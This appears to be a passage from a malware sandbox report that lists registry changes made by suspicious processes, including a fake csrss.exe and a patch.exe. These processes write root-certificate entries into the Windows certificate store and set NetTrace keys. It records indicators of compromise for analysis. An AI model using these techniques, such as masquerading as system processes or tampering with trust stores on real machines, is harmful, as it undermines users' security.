| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1